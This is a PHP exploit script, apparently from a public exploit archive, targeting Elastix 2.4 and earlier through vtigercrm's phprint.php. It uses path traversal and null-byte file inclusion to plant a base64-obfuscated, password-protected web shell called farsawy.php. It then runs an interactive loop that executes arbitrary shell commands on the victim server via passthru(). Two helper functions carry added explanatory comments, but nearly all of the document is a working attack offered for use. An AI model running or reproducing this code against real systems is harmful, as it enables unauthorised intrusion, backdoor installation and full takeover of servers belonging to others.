
Elastix < 2.5, PHP code injection exploit


<?

echo "n+-------------------------------------------+n";

echo "| Elastix <= 2.4 |n";

echo "| PHP Code Injection Exploit |n";

echo "| By i-Hmx |n";

echo "| sec4ever.com |n";

echo "| n0p1337@gmail.com |n";

echo "+-------------------------------------------+n";

echo "n| Enter Target [https://ip] # ";

$target=trim(fgets(STDIN));

$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo=")); ?>';

$faf=fopen("fa.txt","w+");

fwrite($faf,$inj);

fclose($faf);

$myf='fa.txt';

$url = $target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00"; // URL

$reffer = "http://1337s.cc/index.php";

$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";

$cookie_file_path = "/";

echo "| Injecting 1st payloadn";

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_USERAGENT, $agent);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($ch, CURLOPT_REFERER, $reffer);

curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);

curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$result = curl_exec($ch);

curl_close($ch);

//echo $result;

echo "| Injecting 2nd payloadn";

function faget($url,$post){
    // Send $post to $url as a POST body and hand back the raw reply with
    // response headers included (curl_exec's return: a string, or false on failure).
    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_URL            => $url,
        CURLOPT_POSTFIELDS     => $post,
        // cookie path is given as '/', which is a directory rather than a file —
        // cookie persistence across calls is presumably not happening; verify if relied on
        CURLOPT_COOKIEFILE     => '/',
        CURLOPT_COOKIEJAR      => '/',
        // TLS peer and host verification are switched off: the transport has no
        // protection against interception, and this must not be copied into
        // code that talks to anything trusted
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_FOLLOWLOCATION => 0,
        CURLOPT_TIMEOUT        => 20,
        CURLOPT_HEADER         => true,
    ]);
    $reply = curl_exec($handle);
    curl_close($handle);
    return $reply;
}

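function kastr($string, $start, $end){
    // Return the text found between the first occurrence of $start and the
    // next occurrence of $end after it; "" when either marker is missing.
    //
    // $string  haystack to search
    // $start   opening marker (its own characters are not part of the result)
    // $end     closing marker, searched for only after $start
    //
    // The original relied on prefixing a space and comparing the offset with
    // `== 0`, and did no check at all on the closing marker: a missing $end made
    // strpos() return false, which arithmetic turned into a negative length and
    // substr() into an arbitrary tail of the input. Strict `=== false` checks on
    // both lookups make the "not found" result explicit.
    $ini = strpos($string, $start);
    if ($ini === false) return "";
    $ini += strlen($start);
    $fin = strpos($string, $end, $ini);
    if ($fin === false) return "";
    return substr($string, $ini, $fin - $ini);
}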

$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");

echo "| Testing total payloadn";

$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");

if(!eregi("Faris on the mic :D",$total))

{

die("[+] Exploitation Failedn");

}

echo "| Sending CMD test packagen";

$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");

if(!eregi("farsawy",$cmd))

{

echo " + Cmd couldn't executed but we can evaluate php coden + use : $target//vtigercrm/fa.phpn Post : fa=base64coden";

}

echo "| sec4ever shell online ;)nn";

$host=str_replace('https://','',$target);

while(1){

echo "i-Hmx@$host# ";

$c=trim(fgets(STDIN));

if($c=='exit'){die("[+] Terminatingn");}

$payload=base64_encode("passthru('$c');");

$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");

$done=kastr($fuck,"-----------------","-----------------");

echo "$donen";

}

/*

I dont even remember when i exploited this shit!

maybe on 2013?!

whatever , Hope its not sold as 0day in the near future xDD

*/

?>

https://cxsecurity.com/issue/WLB-2015090035
